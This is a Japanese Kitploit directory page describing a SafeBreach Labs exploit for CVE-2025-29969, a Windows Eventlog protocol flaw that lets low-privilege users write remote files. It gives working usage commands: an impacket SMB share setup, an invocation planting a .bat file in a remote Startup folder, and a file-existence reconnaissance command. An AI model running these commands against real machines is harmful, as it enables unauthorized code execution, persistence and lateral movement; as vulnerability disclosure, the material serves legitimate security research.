Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
EventLogin-CVE-2025-29969 — CVE-2025-29969 のエクスプロイト | Kitploit
ツール/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
特権昇格偵察脆弱性分析エクスプロイト横移動ペネトレーションテスト
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

CVE-2025-29969 のエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
6915117ヶ月前Kitploit レビュー済み

EventLogin - CVE-2025-29969

EventLoginは、MS-EVENプロトコルにおけるTime-of-check Time-of-use(TOCTOU)の脆弱性です。この脆弱性により、低権限ユーザーがリモートマシンに任意のファイルを書き込むことが可能になり、リモート書き込みに管理者アカウントが不要になります。

このリポジトリには2つのスクリプトが含まれています。1つは脆弱性を悪用するスクリプト(write_file_remotely.py)で、もう1つは脆弱性のプリミティブの1つを使用して、低権限ユーザーとしてリモートファイルが存在するかどうかを確認するスクリプトです。これは、例えばドメイン内の他のコンピュータにインストールされているプログラムを確認するのに便利です。

詳細な分析はこちらでご覧いただけます:

EventLog-in: Microsoft WindowsのEventlogサービスを使用した弱い資格情報による伝播

write_file_remotely の使い方

まず、impacketを使用してSMB共有を作成します:

impacket-smbserver -smb2support Share /tmp/safebreach

注意:スクリプトは共有名としてハードコードされた'Share'を使用しています。必要に応じて変更してください。

次に、write_file_remotely.pyスクリプトを実行し、必要なすべてのパラメータを指定します:

  1. ip_to_attack - リモートマシンのIPアドレス。
  2. smb_server_ip - 共有を開いたマシンのIPアドレス(攻撃者マシンでも可)。
  3. username and password - 低権限アカウントの資格情報。
  4. valid_evtx_file_path - 先ほど開いた共有に保存した有効なEVTXファイルへのパス。
  5. local_file_path - アップロードするファイル。
  6. remote_file_path - アップロード先のリモートファイルパス。

例:

python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

check_if_exists の使い方

このスクリプトは脆弱性自体を利用せず、"CreateFile"プリミティブのみを使用し、ネットワークの偵察に役立ちます。

例えば、ドメイン内のリモートマシンのProgram Filesディレクトリは、'Users'グループ全体にアクセス可能です。つまり、任意のユーザーの資格情報を使用して、別のマシン上でファイルが存在するかどうかを確認できます。

次のパラメータを受け付けます:

  1. ip_to_attack - 偵察するIPアドレス
  2. username - ドメインユーザーのユーザー名とパスワード。
  3. filepath_to_check - 確認するファイル

例:低権限ユーザーを使用して、DC(192.168.56.57)にWiresharkがインストールされているか確認します。

python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY

ツールをダウンロード